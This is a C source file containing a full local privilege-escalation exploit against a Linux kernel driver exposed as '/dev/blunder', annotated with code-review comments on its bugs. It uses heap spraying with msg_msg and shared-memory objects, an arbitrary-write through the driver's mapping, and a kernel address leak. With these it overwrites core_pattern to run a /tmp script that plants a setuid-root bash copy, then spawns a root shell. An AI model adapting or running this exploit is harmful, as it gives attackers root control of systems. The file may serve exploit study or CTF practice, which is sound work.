#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
/*
 * Build-specific constants.  The numeric offsets are tied to one particular
 * kernel image and driver build; nothing in this file can verify them.
 */
#define IPC "/dev/blunder"               /* device node opened O_RDWR in main() */
#define PAGESZ 4096                      /* length passed to mmap()/mprotect() in main() */
#define INIT_IPC_NS 0xc7e0               /* low 16 bits that leak_kaddress() looks for in each leaked word */
#define KBASE_OFF 0x149c7e0              /* subtracted from the matched word to derive kbase_addr */
#define CORE_PATTERN 0x146cf00           /* added to kbase_addr in main() */
#define CORE_PATTERN_OFFSET 0x8          /* byte offset at which CORE_FILE is copied into final_payload */
#define CORE_FILE "|/tmp/exp"            /* value verify_exploit() expects to read from /proc/sys/kernel/core_pattern */
#define IOCTL_BLUNDER_SEND_MSG _IOWR('s', 2, struct blunder_user_message)   /* used by blunder_send_message() */
#define IOCTL_BLUNDER_RECV_MSG _IOWR('s', 3, struct blunder_user_message)   /* defined but not used in this file */
static int qids[5];                        // message queue ids created by spray_msg_msg()
static int shmids[200];                    // shared-memory segment ids filled by alloc_shm()
static void *shmaddr[200];                 // attach addresses returned by shmat() in alloc_shm()
// Forward declaration; the later definition omits `static` but inherits
// internal linkage from this declaration (C11 6.2.2p5).
static void kill_shm(int idx);
static unsigned long kbase_addr = 0x0;     // written by leak_kaddress()
static unsigned long core_pattern = 0x0;   // written in main() as kbase_addr + CORE_PATTERN
/*
 * Argument block for IOCTL_BLUNDER_SEND_MSG / IOCTL_BLUNDER_RECV_MSG.
 * Field comments describe how blunder_send_message() fills the struct;
 * the driver-side interpretation is not visible here, so treat the layout
 * as an assumption to verify against the kernel module's header.
 */
struct blunder_user_message{
    int handle;            // set to getpid() by blunder_send_message()
    int opcode;            // always 0 in this file
    void *data;            // caller's payload buffer
    size_t data_size;      // number of bytes in `data`
    size_t *offsets;       // NULL in this file
    size_t offsets_size;   // 0 in this file
    int *fds;              // points at a single int holding 1337 in this file
    size_t num_fds;        // 1 in this file
};
/*
 * Apparent layout of the driver's per-buffer record.  No code in this file
 * uses the type directly; main() writes words of the mapping by index instead,
 * and one of its comments refers to sizeof(*blunder_buffer).  The field order
 * is therefore an assumption to check against the driver source.
 */
struct blunder_buffer{
    unsigned long *next;
    unsigned long *prev;
    unsigned long atomic_free;
    size_t buffer_size;
    size_t data_size;
    size_t offsets_size;
};
/*
 * Pin the calling thread to CPU 0.
 *
 * On failure a message is printed to stderr and the process terminates with
 * _exit(-1); on success a confirmation line is printed.
 */
void bind_cpu(void){
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(0, &mask);
    if (sched_setaffinity(0, sizeof(cpu_set_t), &mask) < 0) {
        fprintf(stderr, "[!] cpu bind failed!\n");
        _exit(-1);
    }
    fprintf(stderr, "[+] Binding CPU to 0 core!\n");
}
/*
 * Submit `data` (`data_size` bytes) to the driver on `fd` through
 * IOCTL_BLUNDER_SEND_MSG.  The request carries the caller's pid as handle,
 * opcode 0, no offsets, and a single fd entry holding the value 1337.
 *
 * NOTE(review): declared as returning int but contains no return statement;
 * main() discards the result, but reading it would be undefined behaviour.
 * NOTE(review): the ioctl() return value is never checked, so a rejected
 * request is silently ignored.
 */
int blunder_send_message(int fd, void *data, size_t data_size){
    int fds = {1337};   // a scalar with a braced initializer: one int, passed by address below
    struct blunder_user_message umsg = {
        .handle = getpid(),
        .opcode = 0x0,
        .data = data,
        .data_size = data_size,
        .offsets = NULL,
        .offsets_size = 0x0,
        .fds = &fds,
        .num_fds = sizeof(fds)/sizeof(int),   // == 1
    };
    ioctl(fd, IOCTL_BLUNDER_SEND_MSG, &umsg);
}
/*
 * Look through the sprayed message queues for a word whose low 16 bits equal
 * INIT_IPC_NS and derive kbase_addr from it.
 *
 * For each queue in qids[]: allocate `size` bytes, copy the head message with
 * msgrcv(IPC_NOWAIT|MSG_COPY|MSG_NOERROR) (MSG_COPY leaves the message on the
 * queue), and if exactly `size` bytes came back, walk the buffer as 8-byte
 * words.  On the first match kbase_addr = word - KBASE_OFF and the queue index
 * is returned.  If no queue matches, every shm segment is detached/removed via
 * kill_shm() and -1 is returned.  A failing msgrcv() is fatal (_exit(-1)).
 *
 * NOTE(review): memset() runs before the NULL check, so a failed malloc()
 * dereferences NULL instead of reaching `continue`.
 * NOTE(review): `mem` is only freed when fewer than `size` bytes were copied;
 * on the full-size and on the successful paths it leaks.
 * NOTE(review): `ret == size` compares int with size_t, and "%p" is given an
 * unsigned long ("%lx" would match the type).
 */
int leak_kaddress(size_t size){
    for(int i = 0;i < sizeof(qids)/sizeof(int); i++){
        void *mem = malloc(size);
        memset(mem, 0, size);          // executes before the NULL check below
        if(mem == NULL) continue;
        int ret = msgrcv(qids[i], mem, size, 0, IPC_NOWAIT|MSG_COPY|MSG_NOERROR);
        if (ret < 0) {perror("recv_msg: msgrcv"); _exit(-1); }
        if (ret == size){
            unsigned long *addr = (unsigned long *)mem;
            for(int ii = 0; ii < size/8; ii++){
                if ((addr[ii] & 0xffff) == INIT_IPC_NS){
                    fprintf(stderr, "[+] Leaked kernel address: %p\n", addr[ii]);
                    kbase_addr = addr[ii] - KBASE_OFF;
                    //for(int x = 0; x < 200; x++) kill_shm(x);
                    return i; //it returns the object near
                }
            }
        }else{ free(mem); continue; }
    }
    goto fail;   // the label follows immediately; the goto is redundant
fail:
    for(int i = 0;i < 200; i++) kill_shm(i);
    return -1;
}
/*
 * Create a 0x1000-byte private shared-memory segment (mode 0600) and attach
 * it read-only, storing the id in shmids[idx] and the attach address in
 * shmaddr[idx].  A failing shmget() is fatal (_exit(-1)).
 *
 * NOTE(review): the second test re-reads shmids[idx] instead of comparing the
 * shmat() result with (void *)-1, so an attach failure is never detected.
 */
void alloc_shm(int idx){
    int id = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT|0600);
    if (id < 0) {
        perror("alloc_shm: shmget");
        _exit(-1);
    }
    shmids[idx] = id;
    void *attached = shmat(id, NULL, SHM_RDONLY);
    shmaddr[idx] = attached;
    if (shmids[idx] < 0) {
        perror("alloc_shm: shmat");
        _exit(-1);
    }
}
/*
 * Detach the segment recorded by alloc_shm(idx) and mark it for removal.
 * The return values of shmdt() and shmctl() are not examined.
 */
void kill_shm(int idx){
    void *segment = shmaddr[idx];
    int id = shmids[idx];
    shmdt(segment);
    shmctl(id, IPC_RMID, NULL);
}
/*
 * Send one System V message of `size` body bytes on queue `qid`.
 *
 * The body is filled with byte `c` except for its last 8 bytes, which are set
 * to 0xcc; the message type is `type`.  The struct uses a variable-length
 * member so the body lives on the stack.  A failing msgsnd() is fatal
 * (_exit(-1)).
 */
void send_msg(int qid, long type, int size, int c){
    struct {
        long mtype;
        char mtext[size];
    } packet;
    const size_t body_len = sizeof(packet.mtext);
    const size_t tail_len = 0x8;
    packet.mtype = type;
    memset(packet.mtext, c, body_len - tail_len);
    memset(packet.mtext + (body_len - tail_len), 0xcc, tail_len);
    int rc = msgsnd(qid, &packet, body_len, IPC_NOWAIT);
    if (rc == -1) {
        perror("send_msg: msgsnd");
        _exit(-1);
    }
}
/*
- Spray these objects in kmalloc-4k slab cache
- There are a total of 8 objects per slab
- The aim is to fill the partial slab to trigger the allocation of a new page(slab)
- Allocate maybe 3 slabs, victim object, 4 msg_msg
*/
/*
 * Create one message queue per qids[] slot and put a single 0xfe8-byte
 * message on each, with type (i+1) and fill byte 0x41+i (see send_msg()).
 * A failing msgget() is fatal (_exit(-1)).
 *
 * NOTE(review): main() calls this twice; the second call overwrites qids[]
 * and nothing in this file ever calls kill_qid(), so none of the queues are
 * removed.  System V queues outlive the process, so they remain until removed
 * by hand or at reboot.
 */
void spray_msg_msg(){
    for(int i = 0;i < sizeof(qids)/sizeof(int); i++){
        qids[i] = msgget(IPC_PRIVATE, IPC_CREAT|0666);
        if (qids[i] < 0){
            perror("msgget");
            _exit(-1);
        }
    }
    //send a message to trigger the allocation of struct msgmsg and struct msgseg
    for(int i = 0;i < sizeof(qids)/sizeof(int); i++){
        send_msg(qids[i], (i+1), 0xfe8, (0x41 + i));
    }
}
/*
 * Remove the message queue `qid`.  A failing msgctl() prints the error and
 * terminates the process with _exit(-1).
 */
void kill_qid(int qid){
    int rc = msgctl(qid, IPC_RMID, NULL);
    if (rc >= 0) {
        return;
    }
    perror("msgctl()");
    _exit(-1);
}
/*
 * Write a short shell script to /tmp/exp (created with mode 0777 if absent)
 * and close the descriptor.  A failing open() or a short write() is fatal
 * (_exit(-1)).
 *
 * NOTE(review): `content` is declared unsigned char * but initialised from a
 * char string literal, and strlen() expects const char *; both are implicit
 * pointer-type mismatches that compilers warn about.
 * NOTE(review): `writesz != strlen(content)` compares int with size_t.
 */
void create_core_file(void){
    int fd = open("/tmp/exp", O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
    if (fd < 0) {fprintf(stderr, "[!] cannot create core_file!\n"); _exit(-1); }
    unsigned char *content = "#! /bin/bash\n"
    "\ncp /bin/bash /tmp/bash\n"
    "chmod 4755 /tmp/bash\n";
    int writesz = write(fd, content, strlen(content));
    if (writesz != strlen(content)){
        fprintf(stderr, "[!] Error writing to file!\n");
        _exit(-1);
    }
    close(fd);
}
/*
 * Read the first strlen(CORE_FILE) bytes of /proc/sys/kernel/core_pattern into
 * a zeroed 256-byte buffer, echo them to stderr, and return 1 if they equal
 * CORE_FILE, else 0.
 *
 * NOTE(review): the open() result is not checked; on failure read() and
 * close() are called with -1 and the comparison runs against the zeroed
 * buffer (returning 0).
 * NOTE(review): `readsz` is assigned but never examined.
 */
int verify_exploit(void){
    char buffer[256];
    memset(buffer, 0, sizeof(buffer));
    int fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
    int readsz = read(fd, buffer, strlen(CORE_FILE));
    fprintf(stderr, "[+] core_pattern: %s\n", buffer);
    close(fd);
    if (strncmp(buffer, CORE_FILE, strlen(CORE_FILE)) == 0)
        return 1;
    else
        return 0;
}
/*
 * Signal handler that prints a message and runs "/tmp/bash -p" via system().
 *
 * NOTE(review): nothing in this file installs this handler (no signal() or
 * sigaction() call), so it is currently dead code.  fprintf() and system()
 * are not async-signal-safe, so it should not be run from signal context
 * even if installed.  `signum` is unused.
 */
void sighandler(int signum){
    fprintf(stderr, "[-] Returning Shell :wink!\n");
    system("/tmp/bash -p");
}
/*
 * Program entry point.  Sequence as written:
 *   1. bind_cpu(); open IPC (the driver node) O_RDWR.
 *   2. Fill shmids[0..199] via alloc_shm() in four batches of 50, with a
 *      spray_msg_msg() round after the first and third batch and the driver
 *      mmap() after the second.
 *   3. mprotect() the mapping to RW and write words into it at fixed indices.
 *   4. Send three requests through blunder_send_message(); between the second
 *      and third, leak_kaddress() must succeed or the program exits.
 *   5. create_core_file(), then verify_exploit() reads back core_pattern.
 * Returns 0 only when verify_exploit() reports 0; the "successful" branch
 * terminates with _exit(-1) (exit status 255).
 *
 * NOTE(review): mmap() reports failure with MAP_FAILED ((void *)-1), not
 * NULL, so the `addr == NULL` test never fires.
 * NOTE(review): several fprintf() calls pass unsigned long to "%p"; "%lx"
 * matches the type.
 * NOTE(review): argc/argv are unused and sighandler() is never installed.
 * NOTE(review): the indices written through `addr` (504, 502, 501) and the
 * payload word positions depend on the driver's record layout, which is not
 * visible in this file.
 */
int main(int argc, char **argv){
    unsigned long *addr;
    bind_cpu();
    int fds = open(IPC, O_RDWR);
    if (fds < 0){
        fprintf(stderr, "[!] Error opening driver!\n");
        _exit(-1);
    }
    fprintf(stderr, "[+] open'd '/dev/blunder' for O_RDWR!\n");
    fprintf(stderr, "[+] spraying shm in kmalloc-32\n");
    fprintf(stderr, "[+] spraying msg_msg in kmalloc-4k!\n");
    for(int i = 0;i < 50; i++){
        alloc_shm(i);
    }
    spray_msg_msg();
    for(int i = 50; i < 100; i++)
        alloc_shm(i);
    //The vulnerable mmap implementation that triggers that call to kmalloc
    addr = (unsigned long *) mmap(NULL, PAGESZ, PROT_READ, MAP_SHARED, fds, 0);
    if (addr == NULL){   // never true: mmap() returns MAP_FAILED on error
        fprintf(stderr, "[!] mmap error!\n");
        _exit(-1);
    }
    //spray kmalloc-32 objects
    for(int i = 100;i < 150; i++)
        alloc_shm(i);
    spray_msg_msg();   // second round: overwrites qids[] from the first round
    for(int i = 150; i< 200; i++)
        alloc_shm(i);
    fprintf(stderr, "[+] mmap'd address: %p\n", addr);
    int ret = mprotect((void *) addr, PAGESZ, PROT_READ|PROT_WRITE);
    if (ret != 0){
        fprintf(stderr, "[!] mprotect Error!\n");
        _exit(-1);
    }
    fprintf(stderr, "[+] mprotect'd to (RW-)\n");
    /*
    - The following should split the current buffer into PAGESZ - (3960 + sizeof(*blunder_buffer))
    */
    unsigned char buffer[3960];
    memset(buffer, 0x43, sizeof(buffer));
    blunder_send_message(fds, buffer, sizeof(buffer));   // first request; return value ignored
    /*
    The driver is vulnerable to an AAW: This can be used to modify the details
    of the next 'blunder_buffer' that should allow us to trigger an OOB write (heapoverflow)
    */
    addr[504] = (unsigned long) 80; //blunder_buffer buffer_size
    //This can be used for debugging
    unsigned long kheap_address = addr[502];
    fprintf(stderr, "[+] Leaked kHeap address: %p\n", kheap_address);
    //The payload (heapoverflow) to overwrite the msg_msg struct
    int off = 0x5;
    unsigned long payload[0x9];   // words 0..4 stay zero; 5..8 are set below
    memset(payload, 0x0, sizeof(payload));
    payload[off++] = (unsigned long) 0x0;
    payload[off++] = (unsigned long) kheap_address;
    payload[off++] = (unsigned long) 0x1; //msg_type
    payload[off++] = (unsigned long) 0x1010; //m_ts
    blunder_send_message(fds, payload, sizeof(payload));   // second request
    int idx = leak_kaddress(0x1010);   // sets kbase_addr on success; -1 otherwise
    if (idx < 0){
        fprintf(stderr, "[+] oop! kaddress leak failed!\n");
        _exit(-1);
    }
    core_pattern = kbase_addr + CORE_PATTERN;
    unsigned long fake_blunder_buffer = core_pattern - 0x38;
    fprintf(stderr, "[+] kBase address: %p\n", kbase_addr);
    fprintf(stderr, "[+] Core Pattern: %p\n", core_pattern);
    fprintf(stderr, "[+] Fake blunder_buffer: %p\n", fake_blunder_buffer);
    //The modification of the next pointer to point to fake blunder_buffer
    addr[504 - 0x3] = (unsigned long) fake_blunder_buffer;
    create_core_file();
    unsigned char final_payload[0x80];
    memset(final_payload, 0x0, sizeof(final_payload));
    strcpy((final_payload + CORE_PATTERN_OFFSET), CORE_FILE);   // CORE_FILE plus NUL fits well within 0x80 bytes
    blunder_send_message(fds, final_payload, sizeof(final_payload));   // third request
    //verify exploit - check that /sys/kernel/core_pattern = |/tmp/exp
    fprintf(stderr, "[+] verifying exploit!\n");
    if (verify_exploit()){
        fprintf(stderr, "[+] Exploit successful!\n");
        _exit(-1);   // exits with status 255 even on the reported-success path
    }
    return 0;
}